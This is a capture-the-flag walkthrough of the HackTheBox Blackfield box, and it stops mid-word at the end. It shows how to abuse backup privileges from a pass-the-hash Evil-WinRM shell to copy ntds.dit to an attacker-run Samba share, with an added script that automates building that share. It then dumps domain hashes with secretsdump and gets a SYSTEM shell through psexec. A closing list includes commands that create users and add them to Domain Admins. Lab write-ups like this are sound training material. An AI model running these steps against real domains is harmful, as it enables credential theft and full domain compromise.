
part 1 - creating an smb server on linux or unix for data exfiltration from another server | ntfs disk | dd command | extracting ntds.dit

This scenario was written while working through the HackTheBox Blackfield box.

After getting access to a system, check which privileges you hold by running whoami /all or whoami /priv.

If you see SeBackupPrivilege and SeRestorePrivilege you can proceed with all the steps below. These two are among the most dangerous privileges, especially in AD: a backup operator can read any file on disk regardless of its ACL, which on a domain controller includes the domain database itself.

Create a share on 10.10.10.14 (our machine) so that we can pull data out of the AD we compromised.

Create an SMB server below the directory /home/ippsec/blackfield/:


mkdir smb
cd smb
sudo smbserver.py -smb2support SendMeYourData $(pwd)


or


sudo smbserver.py -smb2support -user ippsec -password PleaseSubscribe SendMeYourData $(pwd)
 

The username and password are whatever you choose; smbserver.py will require them for the share, and they do not have to match any account on your machine.
SendMeYourData is the share name.
Once you press Enter it starts listening on TCP 445 (which is why sudo is needed).

Now go to the AD host where you have the Evil-WinRM shell. The scenario is that you compromised the domain controller and want to exfiltrate c:\windows\ntds\ from it to your own machine.
You are connected to the DC with a WinRM shell. Note: Evil-WinRM was started with the NTLM hash of svc_backup (pass-the-hash), the user that holds the backup privileges above, so everything below runs in that user's context.


*Evil-WinRM* PS C:\Users\svc_backup\Documents> wbadmin start backup -backuptarget:\\10.10.10.14\SendMeYourData  -include:c:\windows\ntds\


or 


If an authentication problem arises, map the share with explicit credentials first:


*Evil-WinRM* PS C:\Users\svc_backup\Documents> net use x: \\10.10.10.14\SendMeYourData /user:ippsec PleaseSubscribe


PleaseSubscribe is the password. 

  
Run as above, the task fails because wbadmin asks "Do you want to start the backup operation?" and waits for Y or N; the Evil-WinRM shell has no interactive console to answer, so pipe the answer in (wbadmin also accepts -quiet to suppress the prompt):

 
*Evil-WinRM* PS C:\Users\svc_backup\Documents> echo y | wbadmin start backup -backuptarget:\\10.10.10.14\SendMeYourData  -include:c:\windows\ntds\


But the command above still will not start the backup, because wbadmin requires the backup target volume to be formatted with NTFS/ReFS, and the directory impacket is serving is not.

Main task starts from here:


So let's create an NTFS file system on our machine (10.10.10.14) and mount it behind the share.
Back on your own machine:
ippsec@parrot$
We are going to create a 2GB NTFS disk image.


dd if=/dev/zero of=ntfs.disk bs=1024M count=2


sudo losetup -fP ntfs.disk


-f (--find) picks the first unused loop device; -P (--partscan) asks the kernel to scan the image for a partition table. There is none here, so /dev/loop0 is the whole image.


losetup -a 


/dev/loop0: /home/ippsec/htb/blackfield/ntfs.disk


Now the image is attached as /dev/loop0 (attached, not yet mounted).


now do the following:


sudo mkfs.ntfs /dev/loop0

 
This formats /dev/loop0 as NTFS (mkfs.ntfs comes from the ntfs-3g package; add -Q for a quick format that skips zeroing all 2GB).

 
sudo mount /dev/loop0 smb/   (mounting /dev/loop0 on the /home/ippsec/htb/blackfield/smb/ directory we created earlier; with ntfs-3g the mount shows up as type fuseblk)


mount | grep smb


/dev/loop0 on /home/ippsec/htb/blackfield/smb

Now run the impacket script again, this time serving the mounted NTFS directory.
From your own machine where you set up the SMB server:


sudo smbserver.py -smb2support -user ippsec -password PleaseSubscribe SendMeYourData $(pwd)

From AD:

*Evil-WinRM* PS C:\Users\svc_backup\Documents> echo y | wbadmin start backup -backuptarget:\\10.10.10.14\SendMeYourData  -include:c:\windows\ntds\

Unfortunately this fails as well: impacket's smbserver.py implements only a subset of SMB, and wbadmin's writes do not get through it. Use a real Samba server instead.

 

OK, now let's do the actual Samba configuration. On your host machine:


mkdir /home/ippsec/htb/blackfield/smb/   (skip if it already exists; it should still have /dev/loop0 mounted on it)


chmod 777 /home/ippsec/htb/blackfield/smb/   (optional; guest writes from the DC arrive as Samba's guest account, so the directory must be writable by it)

 
sudo vi /etc/samba/smb.conf   (the stock Parrot file is roughly 232 lines; append a new share section at the end. If vi shows a $ after every line, that is its :set list end-of-line marker, not part of the file, so do not type it)


[SendMeYourData]
path = /home/ippsec/htb/blackfield/smb/
read only = no
guest ok = yes


If the anonymous connection from Windows is refused, also add map to guest = Bad User under [global] so that unknown users are mapped to the guest account.

 

sudo systemctl restart smbd
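The whole Linux-side procedure above (image file, loop device, NTFS format, mount, Samba share) as one script. This is an added example, not code from the original post. It assumes a Debian/Parrot layout with Samba's config at /etc/samba/smb.conf, ntfs-3g for mkfs.ntfs, util-linux losetup and findmnt, and that the build step runs as root; the share name, image path, size and mount point are the script's own parameters.

```shell
#!/bin/sh
# Added example, not code from the original post: provision the NTFS-backed
# Samba share that wbadmin accepts as a backup target, in one go.
# Assumptions: Samba config at /etc/samba/smb.conf, ntfs-3g (mkfs.ntfs),
# util-linux losetup/findmnt, root privileges for the "build" step.
set -eu

SMB_CONF=/etc/samba/smb.conf

# Render the share section to append to smb.conf. Pure text, so it can be
# checked without root. $1 = share name, $2 = absolute mount point.
render_share_conf() {
    printf '[%s]\n    path = %s\n    read only = no\n    guest ok = yes\n' "$1" "$2"
}

# wbadmin insists on an NTFS/ReFS target. ntfs-3g mounts report "fuseblk",
# the in-kernel driver reports "ntfs3", older kernels "ntfs". $1 = fstype.
fstype_is_ntfs() {
    case "$1" in
        ntfs|ntfs3|fuseblk) return 0 ;;
        *) return 1 ;;
    esac
}

# Create a zero-filled image, attach it to a free loop device, format it
# NTFS and mount it. $1 = image path, $2 = size in MiB, $3 = mount point.
# Prints the loop device that was used.
make_ntfs_mount() {
    img=$1; size_mb=$2; mnt=$3
    mkdir -p "$mnt"
    dd if=/dev/zero of="$img" bs=1M count="$size_mb" status=none
    dev=$(losetup --find --show "$img")       # e.g. /dev/loop0
    mkfs.ntfs -Q "$dev" >/dev/null             # -Q: quick format, no zeroing pass
    mount "$dev" "$mnt"
    fstype_is_ntfs "$(findmnt -no FSTYPE "$mnt")" || {
        echo "mount at $mnt is not NTFS, wbadmin will reject it" >&2; return 1; }
    echo "$dev"
}

# Append the share, make sure anonymous SMB logins map to the guest account,
# syntax-check the config and restart Samba. $1 = share name, $2 = mount point.
publish_share() {
    name=$1; mnt=$2
    grep -qi '^[[:space:]]*map to guest' "$SMB_CONF" ||
        sed -i '/^\[global\]/a map to guest = Bad User' "$SMB_CONF"
    render_share_conf "$name" "$mnt" >>"$SMB_CONF"
    testparm -s >/dev/null                     # fails loudly on a broken smb.conf
    systemctl restart smbd
}

# Usage (as root):
#   sh ntfs_share.sh build ./ntfs.disk 2048 /home/ippsec/htb/blackfield/smb SendMeYourData
if [ "${1:-}" = "build" ]; then
    make_ntfs_mount "$2" "$3" "$4"
    publish_share "$5" "$4"
fi
```

The fstype check is the part worth keeping even if you do the rest by hand: if findmnt reports ext4 for the mount point, the image was not mounted over the share directory and wbadmin will fail exactly as it did against the bare impacket share.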

*Evil-WinRM* PS C:\Users\svc_backup\Documents> net use x: /delete   (if x: is still mapped from the earlier attempt)


*Evil-WinRM* PS C:\Users\svc_backup\Documents> net use x: \\10.10.10.14\SendMeYourData


Now x: is mapped. Let's try the wbadmin command again.


*Evil-WinRM* PS C:\Users\svc_backup\Documents> echo y | wbadmin start backup -backuptarget:\\10.10.10.14\SendMeYourData  -include:c:\windows\ntds\
 

It should work now.

now go to your host machine:


ippsec@parrot$ cd /home/ippsec/htb/blackfield/smb/


watch -n 1 'ls -la'   


You should see WindowsImageBackup appear, under it DC01, and under that a .vhdx file. It will take some time to complete.

from the AD:

*Evil-WinRM* PS C:\Users\svc_backup\Documents> net use x: \\10.10.10.14\SendMeYourData   (map the share so you can browse it from the DC; you did this earlier, so check with net use first and skip it if x: is still mapped)


*Evil-WinRM* PS C:\Users\svc_backup\Documents> x:   (or cd x:\)
dir



Once the backup is done, run the command below to list the backup versions:



*Evil-WinRM* PS C:\Users\svc_backup\Documents> wbadmin get versions

Note down the version identifier, which looks like

10/02/2020-03:51

(MM/DD/YYYY-HH:MM with no space; pass it to -version: exactly as printed. -notrestoreacl drops the original ACLs on the restored copy so svc_backup can read it.)

*Evil-WinRM* PS C:\Users\svc_backup\Documents> echo Y | wbadmin start recovery -version:10/02/2020-03:51 -itemtype:file -items:C:\windows\ntds\ntds.dit -recoverytarget:C:\ -notrestoreacl

Recovering ntds.dit takes a while because it is pulled back from the backup you just created over the share. Once done, follow the steps below.

*Evil-WinRM* PS C:\Users\svc_backup\Documents> cd \

dir

you should see ntds.dit file.   

now download the file:

*Evil-WinRM* PS C:\Users\svc_backup\Documents> download ntds.dit

ntds.dit is saved in the local directory from which you launched evil-winrm on your own machine, e.g. /htb/blackfield/.

ntds.dit is the AD domain database. The hashes inside it are encrypted with a key that is itself protected by the boot key (SYSKEY), which is derived from the HKLM\SYSTEM hive, so you need that hive as well:

*Evil-WinRM* PS C:\Users\svc_backup\Documents> reg save hklm\system system.hive

*Evil-WinRM* PS C:\Users\svc_backup\Documents> download system.hive   (download the SYSTEM hive too)

now go to your host/own machine to run secretsdump.py tool.

ippsec@parrot$

secretsdump.py -ntds ntds.dit -system system.hive LOCAL

secretsdump.py -ntds ntds.dit -system system.hive -history LOCAL   (-history also prints each account's previous password hashes)

 

Now you have the Administrator NT hash, so from your own machine launch psexec.py with pass-the-hash

to access the DC at 10.10.10.192:

ippsec@parrot$

psexec.py -hashes 184fb5e5178480be64824d4cd53b99ee:184fb5e5178480be64824d4cd53b99ee administrator@10.10.10.192

-hashes takes LM:NT. You can pass ntlm:ntlm or lm:ntlm;

the LM portion is not used for authentication, psexec.py just wants the field present. The conventional filler is the empty-password LM hash aad3b435b51404eeaad3b435b51404ee, which is also what secretsdump prints in the LM column.

You should now land in a SYSTEM shell:

C:\Windows\system32> whoami

nt authority\system

C:\Windows\system32> cd \Users\Administrator\Desktop

dir

type root.txt

See part 2.

  To see what users present in the system: net user To see local groups in the system: net localgroup To see domain groups. This should be run on a domain controller: net group To see the details of a user along with his/her group membership: net user mahim To see who are the members of a particular group (local machine): net localgroup "administrators"    (These are not case sensitive. You can use administrators or Administrators. Both will give you same result. To see who are the members of a particular group (domain machine): net group "domain admins" Create a local user: net user localuser1 MyP@ssw0rd /add Create a domain user: net user domainuser1 MyP@ssw0rd /add /domain Add the local user to local admin group: net localgroup Administrators localuser1 /add Add the user to domain admin group: net group "Domain Admins" domainuser1 /add /domain Avi